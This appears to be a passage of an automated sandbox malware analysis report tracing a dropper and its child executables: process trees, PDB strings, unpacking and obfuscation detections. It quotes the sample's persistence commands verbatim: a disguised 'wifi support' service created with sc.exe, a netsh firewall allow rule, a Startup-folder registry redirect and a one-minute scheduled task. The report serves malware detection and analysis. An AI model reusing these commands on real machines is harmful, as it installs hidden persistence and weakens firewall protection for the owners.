                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ozuqupbe
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe"
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A7F0.exe C:\Users\user\AppData\Local\Temp\A7F0.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BC16.exe C:\Users\user\AppData\Local\Temp\BC16.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D452.exe C:\Users\user\AppData\Local\Temp\D452.exe
                          Source: C:\Users\user\AppData\Local\Temp\BC16.exeProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\239.exe C:\Users\user\AppData\Local\Temp\239.exe
                          Source: C:\Users\user\AppData\Local\Temp\D452.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1D34.exe C:\Users\user\AppData\Local\Temp\1D34.exe
                          Source: C:\Users\user\AppData\Local\Temp\239.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2D04.exe C:\Users\user\AppData\Local\Temp\2D04.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeProcess created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1E7F.exe C:\Users\user\AppData\Local\Temp\1E7F.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2DB3.exe C:\Users\user\AppData\Local\Temp\2DB3.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\309C.exe C:\Users\user\AppData\Local\Temp\309C.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjProcess created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ozuqupbe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1E7F.tmpJump to behavior
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00419A4D SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5668:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5200
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: 0.0
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: hijaduvinijebup
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: mocisacatenu
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: wapejan
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: wovag
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: cbH
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: Piruvora
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: gukafipa
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: mawecamaxe
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: Hiwejanoji
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: Pusazide
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: hukujid
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCommand line argument: cbH
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCommand line argument: cbH
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: zmbGUZTICp.exeStatic PE information: More than 200 imports for KERNEL32.dll
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:\zazadix dori\kol.pdb source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb* source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467354885.000000000500A000.00000004.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb. source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: A7F0.exe, 0000001F.00000002.675040264.000000006BE60000.00000002.00020000.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
                          Source: Binary string: Windows.Storage.pdb- source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb| source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdbh source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbd source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbr source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: profapi.pdbn source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: 8C:\cuguzab xobu\17_dacop.pdbh source: zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: JC:\konukuwe_nuyujobapuyozi\la.pdbh source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\cuguzab xobu\17_dacop.pdb source: zmbGUZTICp.exe, zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: C:\konukuwe_nuyujobapuyozi\la.pdb source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp

                          Data Obfuscation:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeUnpacked PE file: 8.2.2DB3.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeUnpacked PE file: 11.2.309C.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeUnpacked PE file: 24.2.tejjnepq.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeUnpacked PE file: 31.2.A7F0.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeUnpacked PE file: 31.2.A7F0.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeUnpacked PE file: 8.2.2DB3.exe.400000.0.unpack .text:ER;.data:W;.gave:W;.noduf:W;.gafal:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeUnpacked PE file: 11.2.309C.exe.400000.0.unpack .text:ER;.data:W;.nife:W;.kiza:W;.lagoti:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeUnpacked PE file: 24.2.tejjnepq.exe.400000.0.unpack .text:ER;.data:W;.nife:W;.kiza:W;.lagoti:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeUnpacked PE file: 31.2.A7F0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00643634 push es; iretd
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 5_2_00739540 push esi; ret
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 5_2_007394DB push esi; ret
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00401880 push esi; iretd
